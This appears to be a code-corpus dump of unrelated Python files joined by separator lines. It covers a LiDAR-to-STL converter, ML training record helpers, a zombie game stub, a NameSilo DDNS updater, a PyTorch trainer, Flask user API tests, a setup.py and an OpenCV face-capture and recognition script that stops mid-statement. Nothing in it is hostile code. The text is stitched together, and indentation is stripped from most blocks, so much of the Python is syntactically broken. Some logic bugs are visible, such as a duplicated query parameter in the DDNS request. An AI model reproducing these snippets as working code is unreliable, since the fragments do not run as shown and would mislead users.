parser.add_argument('--merge', '-m', action='store_true', help='Using this flag will merge all of the point clouds into one file before converting into a DEM.')
parser.add_argument('--no_stl', '-s', action='store_false', help='Using this flag will disable STL generation.')
parser.add_argument('--cleanup', '-c', action='store_true', help='Using this flag will cause the program to automatically delete the unzipped point cloud files after running.')
parser.add_argument('--filter', '-f', type=float, default=False, help='A percent value (0-100, for the slope of the points being smoothed) that will enable the spike smoothing option. This is good if you have points that are floating way up above the model and causing spikes in your final model.')
parser.add_argument('--prj', '-p', action='store_true', help='Using this flag will cause the program to automatically download and use lastools to generate projection files for the elevation models. This is important if you want to generate the STLs yourself in QGIS, but it means you\'ll have to be mindful of lastool\'s license limitations. More info on lastool\'s website.')
parser.add_argument('--external_files', '-e', action='store_true', default=False, help='Using this flag will grab las/laz files from the LAS directory instead of downloading them from an input list.')
#parser.add_argument('--help', '-h', action='help')
args = parser.parse_args()
VERTICAL_SCALE = args.vscale
BASE_HEIGHT = args.base
REDUCE_BY = args.reduce
MERGE_LAS = args.merge
GENERATE_STLS = args.no_stl
DELETE_LAS = args.cleanup
QGIS_COMPATIBLE_DEM=args.prj
if args.filter:
GRID_EXE += f' /spike:{args.filter}'
if not args.external_files:
# For each tile in the USGS dataset, download the zip
f = open(args.input)
list_of_urls = []
list_of_zip = []
for line in f:
if not line.rstrip('\n').endswith('.zip'):
continue
print(line := line.rstrip('\n'))
file_name = wget.filename_from_url(line)
list_of_zip.append(file_name)
list_of_urls.append(line)
# This is the definitive list of all file names for each phase of the pipeline from here out.
list_of_files = [x.removesuffix('.zip') for x in list_of_zip]
list_of_las = [f'LAS\\{x}.las' for x in list_of_files]
if not os.path.exists('LAS'):
os.mkdir('LAS')
with multiprocessing.Pool(16) as p:
p.starmap(get_file_from_url, zip(list_of_urls, list_of_zip))
# Unzip each zip file that was downloaded
p.starmap(unzip_to_las, zip(list_of_zip, list_of_las))
list_of_laz = list(glob.glob('LAS\\*.laz'))
if list_of_laz:
print("LAZ files detected, unzipping...")
with multiprocessing.Pool() as p:
p.starmap(unzip_laz_file, zip(list_of_laz, [x.removesuffix('.laz') + '.las' for x in list_of_laz]))
list_of_las = list(glob.glob('LAS\\*.las'))
list_of_files = [os.path.basename(x).removesuffix('.las') for x in list_of_las]
if MERGE_LAS:
list_of_files = [list_of_files[0]]
# Prep the list of DTM files
list_of_dtm = [f'DTM\\{x}.dtm' for x in list_of_files]
if not os.path.exists('DTM'):
os.mkdir('DTM')
print("\nGenerating .dtm files...\n")
# If necessary, make sure all las files get combined into one DTM
if MERGE_LAS:
os.system(f'{GRID_EXE} {list_of_dtm[0]} {REDUCE_BY} M M 0 0 0 0 LAS\\*.las')
else:
with multiprocessing.Pool() as p:
p.starmap(generate_dem_from_las, zip(list_of_las, list_of_dtm, [args.filter] * len(list_of_las), [REDUCE_BY] * len(list_of_las)))
if not os.path.exists('ASC'):
os.mkdir('ASC')
list_of_asc = [f'ASC\\{x}.asc' for x in list_of_files]
# Convert all the dtm files into asc files
print("\nGenerating .asc files...\n")
for d, a in zip(list_of_dtm, list_of_asc):
print(a)
        if os.path.exists(a):
            continue
        os.system(f'{D2A_EXE} /raster {d} {a}')
if QGIS_COMPATIBLE_DEM:
install_lastools()
list_of_prj = [f'LAS\\{x}.prj' for x in list_of_files]
# Use lastools to generate the prj file that QGIS will need
for l, p in zip(list_of_las, list_of_prj):
os.system(f'{BLAST2DEM_EXE} -i {l} -oasc')
shutil.copy(p, 'ASC')
if GENERATE_STLS:
asc_parse.gen_stls_from_ascs(
list_of_asc=list_of_asc,
list_of_files=list_of_files,
scale_adjustment=REDUCE_BY,
vscale=VERTICAL_SCALE,
base=BASE_HEIGHT,
)
# Delete the directories used for the intermediate steps
print("Cleaning up...")
if DELETE_LAS:
shutil.rmtree('LAS')
shutil.rmtree('DTM')
if __name__ == "__main__":
if sys.platform.startswith('win'):
# On Windows calling this function is necessary.
multiprocessing.freeze_support()
main()
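# Example invocation (illustrative; the script file name is hypothetical and the
# flags map to the argparse options defined in main()):
#   python lidar_to_stl.py --input downloadlist.txt --reduce 2.0 --vscale 1.5 --merge --cleanup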
|
python
|
import numpy as np
import pandas as pd
import os
def prm_to_df(prm):
"""Convert prm to a pandas DataFrame"""
values = list(prm.values())
columns = list(prm.keys())
df_prm = pd.DataFrame(columns=columns)
for value, column in zip(values, columns):
df_prm[column] = [value]
return (df_prm)
def save_on_disk(prm):
"""Saving prm on a specific .csv file"""
df_prm = prm_to_df(prm)
info = '/training_results/' + prm['info']
df_prm.to_csv(prm['output_dir'] + info + '/prm.csv')
def add_columns_to_df(df, columns):
"""Create new columns in a dataframe"""
for column in columns:
df[column] = np.nan
return (df)
def update_training_record(prm):
"""Update a csv file containing all previous info about training"""
# New prm
new_prm = prm_to_df(prm)
# Add new columns
columns = ['RMSE_UV_mean', 'RMSE_UV_std', 'RMSE_UV_min', 'RMSE_UV_max',
'RMSE_UVW_mean', 'RMSE_UVW_std', 'RMSE_UVW_min', 'RMSE_UVW_max',
'RMSE_U_mean', 'RMSE_U_std', 'RMSE_U_min', 'RMSE_U_max',
'RMSE_V_mean', 'RMSE_V_std', 'RMSE_V_min', 'RMSE_V_max',
'RMSE_W_mean', 'RMSE_W_std', 'RMSE_W_min', 'RMSE_W_max',
'corr_coeff_UV_mean', 'corr_coeff_UV_std', 'corr_coeff_UV_min', 'corr_coeff_UV_max',
'corr_coeff_UVW_mean', 'corr_coeff_UV_std', 'corr_coeff_UVW_min', 'corr_coeff_UV_max',
'corr_coeff_U_mean', 'corr_coeff_U_std', 'corr_coeff_U_min', 'corr_coeff_U_max',
'corr_coeff_V_mean', 'corr_coeff_V_std', 'corr_coeff_V_min', 'corr_coeff_V_max',
'corr_coeff_W_mean', 'corr_coeff_W_std', 'corr_coeff_W_min', 'corr_coeff_W_max',
'bias_UV_mean', 'bias_UV_std', 'bias_UV_min', 'bias_UV_max',
'bias_UVW_mean', 'bias_UVW_std', 'bias_UVW_min', 'bias_UVW_max',
'bias_U_mean', 'bias_U_std', 'bias_U_min', 'bias_U_max',
'bias_V_mean', 'bias_V_std', 'bias_V_min', 'bias_V_max',
'bias_W_mean', 'bias_W_std', 'bias_W_min', 'bias_W_max']
new_prm = add_columns_to_df(new_prm, columns)
# Path
out_dir = prm['output_dir'] + 'training_results/'
path_file = out_dir + 'training_prm_record.csv'
if os.path.isfile(path_file):
# Load all_prm
all_prm = pd.read_csv(path_file)
# Append new prm to all_prm
all_prm = all_prm.append(new_prm)
else:
all_prm = new_prm
# Save all_prm
all_prm.to_csv(path_file)
print('\nprm saved in training_prm_record.csv\n')
def create_name_simu_and_info(index, prm):
"""Create name_simu and info key"""
prm['name_simu'] = prm['name_simu'] + "_" + str(index)
prm['info'] = 'date_' + prm['date'] + '_name_simu_' + prm['name_simu'] + '_model_' + prm['model']
return (prm)
|
python
|
import time
import random
#import pygame
import threading
'''
Start with the person in an empty room with zombies coming at them. The maze, is part of the "nice to have" section, but not pertinent.
'''
class Zombies:
def __init__(self, xcor, ycor):
self.xcor = xcor
self.ycor= ycor
self.image = ''
#the above empty string will eventually be part of a pygame module
def __str__(self):
string = ""
string += "X Coordinate: " + str(self.xcor) + "\n"
string += "Y Coordinate: " + str(self.ycor) + "\n"
return string
    def movement(self, player):
        # Step one unit at a time toward the player's position
        self.xcor += 1 if self.xcor < player.xcor else (-1 if self.xcor > player.xcor else 0)
        self.ycor += 1 if self.ycor < player.ycor else (-1 if self.ycor > player.ycor else 0)
'''
Pass an x,y unit as to where the player is. Then the zombie has to move a unit at a time to be constantly moving towards the player. Figure out the x coordinate (if < or >, add or subtract 1 accordingly)
'''
def death(self , bullet):
if self.xcor == bullet.xcor and self.ycor == bullet.ycor:
return("Zombie's Dead")
#when we start using pygame, there's a collision ability which will be used instead of this
else:
return "Alive!"
#At some point we're going to need to keep track of the zombies as images, since they're stored as x and y. This is something we'll learn after break but we should add a tentative part of the init that the self.image (to keep track of data items)
class Spawn:
#this class should be a function in the Controller class
def __init__(self,xcor,ycor):
self.xcor=xcor
self.ycor=ycor
    def zspawn(self, zombie, player):
        # Schedule the zombie to start moving toward the player after 3 seconds
        self.timer = threading.Timer(3, zombie.movement, args=(player,))
        self.timer.start()
class Player:
def __init__(self,xcor,ycor):
self.xcor=xcor
self.ycor=ycor
        self.image = ''  # this is like the zombie note above
def __str__(self):
string = ""
string += "X Coordinate: " + str(self.xcor) + "\n"
string += "Y Coordinate: " + str(self.ycor) + "\n"
return string
def movement(self, xcor, ycor):
self.xcor = xcor
self.ycor = ycor
#send in a direction, not an x and y coordinate. Moving one or two pixel at a time.
    def death(self, zombie):
        if self.xcor == zombie.xcor and self.ycor == zombie.ycor:
            return ("game_over")
#same collision note as above
class Score:
def __init__(self, xcor, ycor, time):
self.xcor=xcor
self.ycor=ycor
self.time=time
#writing to a file --> for data requirement
#Won't need an x and y coordinate, but would be handled by your view
#This should keep track of time and high scores of how long people could stay alive
class Bullet:
def __init__(self, xcor, ycor):
self.xcor=xcor
self.ycor=ycor
#self.bulletcount=bulletcount
def movement(self, xcor, ycor):
self.xcor = xcor
self.ycor = ycor
#same deal as above
#pass in parameter direction so it moves in that direction forever until it hits something or leaves the screen. DOn't need the x and y coor because you just need the initial direction
#loop
    def hit(self, bullet, zombie):
        if bullet.xcor == zombie.xcor and bullet.ycor == zombie.ycor:
            return("delete zombie")
else:
return("delete bullet")
#collision stuff from pygame but good for now
'''Each of these class should be on a different file'''
|
python
|
# -*- coding: utf-8 -*-
from .schema import dump, load
from .loaded import LoadedValue
from .schema import CallableFunc
__all__ = ['dump', 'load', 'LoadedValue', 'CallableFunc']
|
python
|
#!/usr/bin/env python
# Author: CloudNClock @ github
# Date 2020/01/26
# Usage: DDNS updating for namesilo
import urllib3
import xmltodict
import requests
import time
import sys
import datetime
import configparser
import xml.etree.ElementTree as ET
# Update DNS in namesilo
def update(currentIP,recordID,targetDomain,targetIP):
# Initial DNS update request
updateDNSRecords_request="https://www.namesilo.com/api/dnsUpdateRecord?version=1&type=xml&key=" \
+ apiKey + "&domain=" + domain \
+"&rrid=" + recordID
if host != "":
updateDNSRecords_request += "&rrhost=" + host
updateDNSRecords_request += "&rrhost=" + host \
+"&rrvalue=" + currentIP \
+ "&rrttl=7207"
# Evaluate the response
response = requests.get(updateDNSRecords_request)
Element = ET.fromstring(response.content)
for reply in Element.iter('reply'):
detail = reply.find('detail').text
if detail != "success":
print("Error: " + detail)
print("Exiting ... ")
file = open("DDNS_Update.log", "a+")
ts = time.time()
timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
file.writelines(timestamp + "\n")
file.writelines("Error: " + detail + "\n\n")
file.close()
sys.exit()
else:
file = open("DDNS_Update.log", "a+")
ts = time.time()
timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
file.writelines(timestamp + "\n")
file.writelines(targetDomain + "\n")
file.writelines(targetIP + " Updated to -> " + currentIP + "\n\n")
file.close()
# Check if the public IP has changed and perform the update if so
def check():
    # Initial request to namesilo
dnsListRecords_request = "https://www.namesilo.com/api/dnsListRecords?version=1&type=xml&key="\
+ apiKey + "&domain=" + domain
# Get response from namesilo
response = requests.get(dnsListRecords_request)
Element = ET.fromstring(response.content)
# Determine if the request is success
for reply in Element.iter('reply'):
detail = reply.find('detail').text
if detail != "success":
print("Error: " + detail)
print("Exiting ... ")
file = open("DDNS_Update.log", "a+")
ts = time.time()
timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
file.writelines(timestamp + "\n")
file.writelines("Error: " + detail + "\n\n")
file.close()
sys.exit()
# Find local IP
for request in Element.iter('request'):
currentIP = request.find('ip').text
break
# Add host to target domain if found
if host != "":
targetDomain = host + "." + domain
else:
targetDomain = domain
# Find record ID for updating usage
found = 0
for resource_record in Element.iter('resource_record'):
temp_host = resource_record.find('host').text
if temp_host == targetDomain:
found = 1
targetIP = resource_record.find('value').text
recordID = resource_record.find('record_id').text
if found == 0:
print("Error:" + targetDomain + "not found.")
print("Existing ... ")
sys.exit()
#Update it if the public IP is changed
if currentIP != targetIP:
update(currentIP, recordID,targetDomain,targetIP )
else:
file = open("DDNS_Update.log", "a+")
ts = time.time()
timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
file.writelines(timestamp + "\n")
file.writelines("Public IP have not changed.\n\n")
file.close()
# Read Config File
conf = configparser.ConfigParser()
conf.read('config.ini', encoding="utf-8")
domain = conf.get('DEFAULT', 'domain')
host = conf.get('DEFAULT', 'host')
apiKey = conf.get('DEFAULT', 'api_key')
check_interval = conf.getint('DEFAULT', 'check_interval')
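# The configuration file is expected to provide the four keys read above.
# A minimal sketch of config.ini (all values are placeholders):
#
#   [DEFAULT]
#   domain = example.com
#   host = www
#   api_key = YOUR_NAMESILO_API_KEY
#   check_interval = 300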
# Begin checking
while True:
check()
time.sleep(check_interval)
|
python
|
import torch
from abc import ABCMeta, abstractmethod
from torchtrainer.utils.mixins import CudaMixin
from .callbacks import Callback, CallbackContainer, History
from .meters import ZeroMeasurementsError
from enum import Enum
from itertools import chain
from torch.autograd import Variable
from .utils.defaults import parse_meters
class ValidationGranularity(Enum):
AT_LOG='log'
AT_EPOCH='epoch'
class _OnLogValidScheduler(Callback):
def on_log(self):
self.trainer._validate()
class _OnEpochValidScheduler(Callback):
def on_log(self):
if self.trainer.step == self.trainer.total_steps-1:
self.trainer._validate()
class BatchValidator(CudaMixin, metaclass=ABCMeta):
""" Abstract class for all validation classes that works with batched inputs.
All those validators should subclass this class
"""
METER_ALREADY_EXISTS_MESSAGE=('Meter {name} already exists as train meter')
def __init__(self, model, meters):
super(BatchValidator, self).__init__()
self.model = model
meters = parse_meters(meters)
self._meters = meters
self._metrics = {}
def _prepare_tensor(self, x):
if torch.is_tensor(x):
return Variable(self._tensor_to_cuda(x))
else:
return x
@abstractmethod
def validate_batch(self, *arg, **kwargs):
""" Abstract method for validate model per batch
Args:
*args (variable length arguments of :class:`torch.autograd.Variable`
of Tensors or cuda Tensors):
                Unnamed batch parameters
**kwargs (variable length keyword arguments of
:class:`torch.autograd.Variable` of
Tensors or cuda Tensors):
Named batch parameters
"""
pass
def meters_names(self):
return self._meters.keys()
@property
def meters(self):
return self._meters
def _compile_metrics(self):
for metric_name, meter in self._meters.items():
try:
value = meter.value()
self._metrics[metric_name] = value
except ZeroMeasurementsError:
continue
def _reset_meters(self):
self._metrics = {}
for meter in self._meters.values():
meter.reset()
def validate(self, valid_dataloader):
self._reset_meters()
if not valid_dataloader:
return self._metrics
self.model.train(mode=False)
with torch.no_grad():
for batch in valid_dataloader:
if isinstance(batch, torch.Tensor):
batch = (batch, )
batch = list(map(self._prepare_tensor, batch))
self.validate_batch(*batch)
self.model.train(mode=True)
self._compile_metrics()
return self._metrics
def add_named_meter(self, name, meter):
if name in self._meters:
raise Exception(self.METER_ALREADY_EXISTS_MESSAGE.format(name=name))
self._meters[name] = meter
class BatchTrainer(CudaMixin, metaclass=ABCMeta):
""" Abstract trainer for all trainer classes that works with batched inputs.
All those trainers should subclass this class
"""
INVALID_EPOCH_MESSAGE=('Expected epoch to be a non-negative integer, '
'got: {epochs}')
    INVALID_LOGGING_FRECUENCY_MESSAGE=('Expected logging frequency to be a '
                                       'non-negative integer, '
                                       'got: {logging_frecuency}')
    INVALID_VALIDATION_GRANULARITY_MESSAGE=('Expected validation granularity '
                                            'to be one of '
                                            '\'ValidationGranularity.AT_LOG\' or '
                                            '\'ValidationGranularity.AT_EPOCH\', '
                                            'got: {mode}')
METER_ALREADY_EXISTS_MESSAGE=('Meter {name} already exists as train meter')
SCHED_BY_GRANULARITY = {ValidationGranularity.AT_EPOCH : _OnEpochValidScheduler,
ValidationGranularity.AT_LOG: _OnLogValidScheduler}
@staticmethod
def prepend_name_dict(prefix, d):
return {prefix + name: value for name, value in d.items()}
@abstractmethod
def create_validator(self):
# return BatchValidator(self.model, self.val_meters)
pass
def __init__(self,
model,
callbacks=[],
train_meters={}, val_meters={},
logging_frecuency=1,
prefixes=('', ''),
validation_granularity=ValidationGranularity.AT_EPOCH):
""" Constructor
Args:
model (:class:`torch.nn.Module`):
Module to train
callbacks (:class:`torchtrainer.callbacks.Callback`):
Pluggable callbacks for epoch/batch events.
train_meters (list of :class: `torchtrainer.meters.Meter'):
Training meters
val_meters (list of :class: `torchtrainer.meters.Meter'):
Validation meters
logging_frecuency (int):
                Frequency of logging used to monitor train/validation
prefixes (tuple, list):
Prefixes of train and val metrics
validation_granularity (ValidationGranularity):
Change validation criterion (after every log vs after every epoch)
"""
if logging_frecuency < 0:
raise Exception(self.INVALID_LOGGING_FRECUENCY_MESSAGE.format(logging_frecuency=logging_frecuency))
if not isinstance(validation_granularity,ValidationGranularity) or validation_granularity not in ValidationGranularity:
raise Exception(self.INVALID_VALIDATION_GRANULARITY_MESSAGE.format(mode=validation_granularity))
super(BatchTrainer, self).__init__()
valid_sched = self.SCHED_BY_GRANULARITY[validation_granularity]()
self.logging_frecuency = logging_frecuency
self.model = model
self._epochs_trained = 0
self._steps_trained = 0
self._train_metrics = {}
self._val_metrics = {}
self._prefixes = prefixes
train_meters = parse_meters(train_meters)
if val_meters is None:
val_meters = {name: meter.clone() for name, meter in train_meters.items()}
else:
val_meters = parse_meters(val_meters)
self.train_meters = self.prepend_name_dict(prefixes[0], train_meters)
self.val_meters = self.prepend_name_dict(prefixes[1], val_meters)
self._raised_stop_training = False
self._history_callback = History()
self.validator = self.create_validator()
self._callbacks = CallbackContainer()
self._callbacks.accept(self)
self._callbacks.add(valid_sched)
self._callbacks.add(self._history_callback)
for callback in callbacks:
self._callbacks.add(callback)
@property
def history(self):
return self._history_callback.registry
def cuda(self, device=None):
""" Turn model to cuda
"""
super(BatchTrainer, self).cuda(device=device)
self.model.cuda(device=device)
self.validator.cuda(device=device)
def cpu(self):
""" Turn model to cpu
"""
super(BatchTrainer, self).cpu()
self.model.cpu()
self.validator.cpu()
def meters_names(self):
""" Returns the meters names
"""
return sorted(chain(self.train_meters.keys(),
self.validator.meters_names()))
@property
def meters(self):
return {**self.train_meters, **self.validator.meters}
@property
def metrics(self):
""" Last statistic recopiled from meters
Returns
dict: Dictionary of metric name and value, one for each
`meters` that made at least one measure
"""
return {**self._train_metrics, **self._val_metrics}
def _compile_train_metrics(self):
self._train_metrics = {}
for metric_name, meter in self.train_meters.items():
try:
value = meter.value()
self._train_metrics[metric_name] = value
except ZeroMeasurementsError:
continue
@property
def epochs_trained(self):
""" Total number of epochs epochs_trained
Returns:
int: number of epochs
"""
return self._epochs_trained
@property
def steps_trained(self):
return self._steps_trained
    @epochs_trained.setter
    def epochs_trained(self, value):
        if value < 0:
            raise AttributeError('can\'t set epochs_trained '
                                 'to a value less than zero')
        self._epochs_trained = value
@abstractmethod
def update_batch(self, *args, **kwargs):
""" Abstract method for update model parameters given a batch
Args:
*args (variable length arguments of :class:`torch.autograd.Variable`
of Tensors or cuda Tensors):
                Unnamed batch parameters
**kwargs (variable length keyword arguments of
:class:`torch.autograd.Variable` of
Tensors or cuda Tensors):
Named batch parameters
"""
pass
def reset_meters(self):
self._train_metrics = {}
self._val_metrics = {}
for meter in self.train_meters.values():
meter.reset()
def _prepare_tensor(self, x):
if torch.is_tensor(x):
return Variable(self._tensor_to_cuda(x))
else:
return x
def log(self):
self._callbacks.on_log()
def log_started(self):
return self.logging_frecuency > 0 and self.step % self.logging_frecuency == 0
def _train_epoch(self, train_dataloader, valid_dataloader=None):
for self.step, batch in enumerate(train_dataloader):
if self.log_started():
self.reset_meters()
# convert to 1-d tuple if batch was a tensor instead of a tuple
if torch.is_tensor(batch):
batch = (batch, )
batch = map(self._prepare_tensor, batch)
self.update_batch(*batch)
self._steps_trained += 1
if self._is_time_to_log():
self._compile_train_metrics()
self.log()
self._epochs_trained += 1
def train(self, dataloader, valid_dataloader=None, epochs=1):
""" Train the model
Args:
dataloader (:class:`torch.utils.DataLoader`):
Train data loader
valid_dataloader (:class:`torch.utils.DataLoader`):
Validation data loader
epochs (int):
Number of epochs to train
"""
if epochs < 0:
raise Exception(self.INVALID_EPOCH_MESSAGE.format(epochs=epochs))
self._raised_stop_training = False
self.total_epochs = epochs
self.total_steps = len(dataloader)
self.valid_dataloader = valid_dataloader
self._callbacks.on_train_begin()
# Turn model to training mode
self.model.train(mode=True)
self.epoch = 0
while self.epoch < self.total_epochs and not self._raised_stop_training:
self._callbacks.on_epoch_begin()
self._train_epoch(dataloader, valid_dataloader)
self._callbacks.on_epoch_end()
self.epoch += 1
self._callbacks.on_train_end()
del self.valid_dataloader
# Turn model to evaluation mode
self.model.train(mode=False)
def _is_time_to_log(self):
log_frec = self.logging_frecuency
return log_frec > 0 and ((self.total_steps % log_frec != 0 and
self.step == self.total_steps - 1)
or self.step % log_frec == log_frec - 1)
def _validate(self):
self._val_metrics = self.validator.validate(self.valid_dataloader)
def stop_training(self):
self._raised_stop_training = True
def add_named_train_meter(self, name, meter):
name = self._prefixes[0] + name
if name in self.train_meters:
raise Exception(self.METER_ALREADY_EXISTS_MESSAGE.format(name=name))
self.train_meters[name] = meter
def add_named_val_meter(self, name, meter):
name = self._prefixes[1] + name
self.validator.add_named_meter(name, meter)
def add_callback(self, callback):
self._callbacks.add(callback)
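# ---------------------------------------------------------------------------
# Minimal concrete-subclass sketch (not part of the library API): it only
# illustrates the two abstract hooks that must be implemented. The plain
# supervised criterion/optimizer handling below is an assumption, and a real
# implementation would also feed its meters inside the two *_batch methods.
# ---------------------------------------------------------------------------
class _ExampleValidator(BatchValidator):
    def validate_batch(self, x, y):
        # Forward pass only; meters added via add_named_meter would consume
        # the predictions here in a real implementation.
        self.model(x)

class _ExampleSupervisedTrainer(BatchTrainer):
    def __init__(self, model, criterion, optimizer, **kwargs):
        self.criterion = criterion
        self.optimizer = optimizer
        super(_ExampleSupervisedTrainer, self).__init__(model, **kwargs)

    def create_validator(self):
        return _ExampleValidator(self.model, self.val_meters)

    def update_batch(self, x, y):
        self.optimizer.zero_grad()
        loss = self.criterion(self.model(x), y)
        loss.backward()
        self.optimizer.step()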
|
python
|
version = '0.66'
short_version = version
full_version = version
|
python
|
from flask import url_for
from authentek.database.models import User
def test_get_user(client, db, user, admin_headers):
# test 404
user_url = url_for('api.user_by_id', user_id="100000")
rep = client.get(user_url, headers=admin_headers)
assert rep.status_code == 404
db.session.add(user)
db.session.commit()
# test get_user
user_url = url_for('api.user_by_id', user_id=user.id)
rep = client.get(user_url, headers=admin_headers)
assert rep.status_code == 200
data = rep.get_json()["user"]
assert data["username"] == user.username
assert data["email"] == user.email
assert data["active"] == user.active
def test_put_user(client, db, user, admin_headers):
# test 404
user_url = url_for('api.user_by_id', user_id="100000")
rep = client.put(user_url, headers=admin_headers)
assert rep.status_code == 404
db.session.add(user)
db.session.commit()
data = {"username": "updated"}
user_url = url_for('api.user_by_id', user_id=user.id)
# test update user
rep = client.put(user_url, json=data, headers=admin_headers)
assert rep.status_code == 200
data = rep.get_json()["user"]
assert data["username"] == "updated"
assert data["email"] == user.email
assert data["active"] == user.active
def test_delete_user(client, db, user, admin_headers):
# test 404
user_url = url_for('api.user_by_id', user_id="100000")
rep = client.delete(user_url, headers=admin_headers)
assert rep.status_code == 404
db.session.add(user)
db.session.commit()
# test get_user
user_url = url_for('api.user_by_id', user_id=user.id)
rep = client.delete(user_url, headers=admin_headers)
assert rep.status_code == 200
assert db.session.query(User).filter_by(id=user.id).first() is None
def test_create_user(client, db, admin_headers):
# test bad data
users_url = url_for('api.users')
data = {"username": "created"}
rep = client.post(users_url, json=data, headers=admin_headers)
assert rep.status_code == 400
data["password"] = "admin"
data["email"] = "[email protected]"
rep = client.post(users_url, json=data, headers=admin_headers)
assert rep.status_code == 201
data = rep.get_json()
user = db.session.query(User).filter_by(id=data["user"]["id"]).first()
assert user.username == "created"
assert user.email == "[email protected]"
def test_get_all_user(client, db, user_factory, admin_headers):
users_url = url_for('api.users')
users = user_factory.create_batch(30)
db.session.add_all(users)
db.session.commit()
rep = client.get(users_url, headers=admin_headers)
assert rep.status_code == 200
results = rep.get_json()
for user in users:
assert any(u["id"] == user.id for u in results["results"])
|
python
|
''' setup
'''
import re
import io
from distutils.command.build_ext import build_ext as build_ext_orig
from setuptools import setup, find_packages, Extension
# source: https://stackoverflow.com/a/39671214
__version__ = re.search(
r'__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
io.open('nei_vcf/__init__.py', encoding='utf_8_sig').read()
).group(1)
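# The regex above pulls the __version__ string out of nei_vcf/__init__.py without
# importing the package, so setup.py can run before the C++ extensions are built.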
# ==== ctypes extensions
class CTypesExtension(Extension):
'''CTypesExtension'''
class build_ext(build_ext_orig):
'''build_ext'''
def build_extension(self, ext):
self._ctypes = isinstance(ext, CTypesExtension)
return super().build_extension(ext)
def get_export_symbols(self, ext):
if self._ctypes:
return ext.export_symbols
return super().get_export_symbols(ext)
def get_ext_filename(self, ext_name):
if self._ctypes:
return ext_name + '.so'
return super().get_ext_filename(ext_name)
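# The overrides above keep ctypes extensions free of Python-specific symbol exports
# and give the built libraries a plain '.so' suffix (instead of e.g.
# '.cpython-38-x86_64-linux-gnu.so'), which makes them straightforward to locate and
# open with ctypes.CDLL at runtime.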
nei_module = CTypesExtension(
'nei_vcf.lib.nei',
sources=['nei_vcf/src/nei.cpp'],
language='c++',
)
vcf_module = CTypesExtension(
'nei_vcf.lib.vcf',
sources=['nei_vcf/src/vcf.cpp'],
language='c++',
)
ext_modules = [
nei_module,
vcf_module,
]
install_requires = [
'numpy',
]
# ====
description = 'Nei (SNP) distance calculation for VCF data.'
long_description = io.open('README.md').read()
long_description_content_type = 'text/markdown'
# ====
setup(
name='nei_vcf',
version=__version__,
packages=find_packages(),
description=description,
long_description=long_description,
long_description_content_type=long_description_content_type,
author='Tankred Ott',
platforms=['any'],
python_requires='>=3.6',
install_requires=install_requires,
cmdclass={'build_ext': build_ext},
ext_modules=ext_modules,
# url='',
entry_points = {
'console_scripts': [
'nei_vcf=nei_vcf.commandline:main'
],
},
)
|
python
|
#!/usr/bin/env python3
"""opencv module tests"""
import sys
import os
import inspect
import logging
import cv2
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import colors
from matplotlib import ticker
from matplotlib.colors import LinearSegmentedColormap
logger = logging.getLogger("OPENCV")
def opencv_module(args=None):
logger.info("modules_opencv")
if args:
print(vars(args))
logger.info(vars(args))
# vid_test(args)
NIRPlantVideoTracking(args)
# https://www.geeksforgeeks.org/face-detection-using-python-and-opencv-with-webcam/
# webcam_create_data(args)
# webcam_face_recognize(args)
    # naive approach to getting a list of webcam ids
# https://stackoverflow.com/a/62639343
# list_cams(args)
def webcam_create_data(args):
module_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
input_dir = module_dir + "/../../input"
output_dir = module_dir + "/../../output"
# Creating database
# It captures images and stores them in datasets
# folder under the folder name of sub_data
haar_file = input_dir + "/haarcascade_frontalface_default.xml"
    # All the face data will be
    # stored in this folder
datasets = output_dir + "/datasets"
if not os.path.isdir(datasets):
os.mkdir(datasets)
    # These are sub-datasets of the folder;
    # for my faces I've used my name, but you can
    # change the label here
sub_data = "me2"
path = os.path.join(datasets, sub_data)
if not os.path.isdir(path):
os.mkdir(path)
# defining the size of images
(width, height) = (130, 100)
    # camera index 0 is usually the built-in webcam; if another
    # camera is attached, change the index passed to
    # cv2.VideoCapture below (index 2 is used here)
face_cascade = cv2.CascadeClassifier(haar_file)
webcam = cv2.VideoCapture(2)
    # The program loops until it has captured 49 images of the face.
count = 1
while count < 50:
(_, im) = webcam.read()
gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 4)
for (x, y, w, h) in faces:
cv2.rectangle(im, (x, y), (x + w, y + h), (255, 0, 0), 2)
face = gray[y : y + h, x : x + w]
face_resize = cv2.resize(face, (width, height))
cv2.imwrite("% s/% s.png" % (path, count), face_resize)
count += 1
cv2.imshow("OpenCV", im)
key = cv2.waitKey(10)
if key == 27:
break
def webcam_face_recognize(args):
module_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
input_dir = module_dir + "/../../input"
output_dir = module_dir + "/../../output"
# It helps in identifying the faces
# size = 4
haar_file = input_dir + "/haarcascade_frontalface_default.xml"
datasets = output_dir + "/datasets"
if not os.path.isdir(datasets):
os.mkdir(datasets)
# Part 1: Create fisherRecognizer
print("Recognizing Face Please Be in sufficient Lights...")
# Create a list of images and a list of corresponding names
(images, labels, names, id) = ([], [], {}, 0)
for (subdirs, dirs, files) in os.walk(datasets):
for subdir in dirs:
names[id] = subdir
subjectpath = os.path.join(datasets, subdir)
for filename in os.listdir(subjectpath):
path = subjectpath + "/" + filename
label = id
images.append(cv2.imread(path, 0))
labels.append(int(label))
id += 1
(width, height) = (130, 100)
# Create a Numpy array from the two lists above
(images, labels) = [np.array(lis) for lis in [images, labels]]
# OpenCV trains a model from the images
# NOTE FOR OpenCV2: remove '.face'
model = cv2.face.LBPHFaceRecognizer_create()
model.train(images, labels)
# Part 2: Use fisherRecognizer on camera stream
face_cascade = cv2.CascadeClassifier(haar_file)
webcam = cv2.VideoCapture(2)
while True:
(_, im) = webcam.read()
gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
cv2.rectangle(im, (x, y), (x + w, y + h), (255, 0, 0), 2)
face = gray[y : y + h, x : x + w]
face_resize = cv2.resize(face, (width, height))
# Try to recognize the face
prediction = model.predict(face_resize)
cv2.rectangle(im, (x, y), (x + w, y + h), (0, 255, 0), 3)
if prediction[1] < 500:
